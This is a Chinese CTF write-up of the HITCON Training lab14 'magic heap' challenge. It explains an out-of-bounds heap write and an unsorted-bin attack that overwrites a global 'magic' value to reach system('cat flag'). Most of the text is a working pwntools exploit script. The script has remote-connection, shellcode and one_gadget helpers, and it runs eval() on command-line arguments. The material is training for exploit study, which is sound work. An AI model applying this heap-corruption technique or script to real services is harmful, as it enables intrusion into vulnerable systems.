HITCON Training lab14 magic heap
程序分析
在IDA中分析程序中只有create
、edit
、free
三个功能
其中edit
功能可以越界写
存在system("cat flag")
函数,且当控制 v3 为 4869
同时控制 magic 大于 4869
,就可以得到 flag 了
利用思路
首先free掉一块0x80的堆块到unsortedbin
之后我们通过edit功能的越界写漏洞接触chunk_0来修改已经被free掉的chunk_1
使其bk
指针指向magic-0x10
的地址
最后当我们再次create申请一个0x80堆块的时候。magic的地址上便会写入main_arena+88
的地址
而这便已经大于了4869。
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106
|
import os import sys from pwn import * from one_gadget import generate_one_gadget
context.terminal = ["tmux","new-window"]
def RemPro(ip='',port=''): global sh,elf,libc,one_ggs elf_addr = "./magic_heap" libc_addr = "/lib/x86_64-linux-gnu/libc.so.6" pro_libc = "" if len(sys.argv) > 2 : sh = remote(sys.argv[1],sys.argv[2]) try: libc = ELF(pro_libc) libc_addr = pro_libc except: log.info("No set Remote_libc...") libc = ELF(libc_addr) else: libc = ELF(libc_addr) try: sh = remote(ip,port) if pro_libc != "": libc = ELF(pro_libc) libc_addr = pro_libc except: sh = process(elf_addr) elf = ELF(elf_addr) return 1
def debug(cmd=""): if len(sys.argv) <= 2: log.progress("Loading Debug....") gdb.attach(sh,cmd)
def shell_code(fw): if fw == 32: return asm(shellcraft.sh()) elif fw == 64: return asm(shellcraft.amd64.linux.sh())
def one_gadget(libc_addr): log.progress("Leak One_Gadgets...") path_to_libc=libc_addr gadget =[] for offset in generate_one_gadget(path_to_libc): gadget.append(int(offset)) return gadget def exp(): def add(size,content): sh.sendlineafter("choice :","1") sh.sendlineafter("Heap : ",str(size)) sh.sendlineafter("heap:",content) def edit(idx,size,content): sh.sendlineafter("choice :","2") sh.sendlineafter("Index :",str(idx)) sh.sendlineafter("Heap : ",str(size)) sh.sendlineafter("heap : ",content) def dele(idx): sh.sendlineafter("choice :","3") sh.sendlineafter("Index :",str(idx))
add(0x20,"a"*8) add(0x80,"b"*8) add(0x20,"c"*8) dele(1) magic_addr = 0x6020c0 edit(0,0x20+0x20,"a"*0x20+p64(0x0)+p64(0x91)+p64(0x123)+p64(magic_addr-0x10)) debug() add(0x80,p64(9999)) sh.recvuntil("choice :") sh.sendline("4869") return sh if __name__=="__main__": RemPro() if len(sys.argv) > 3 : eval(sys.argv[3])() elif (len(sys.argv)>1 and len(sys.argv)<3): eval(sys.argv[1])() else: exp() sh.interactive()
|
一眨眼居然2个月没有更新了,生产队的驴都不敢这样歇….惨惨 :-(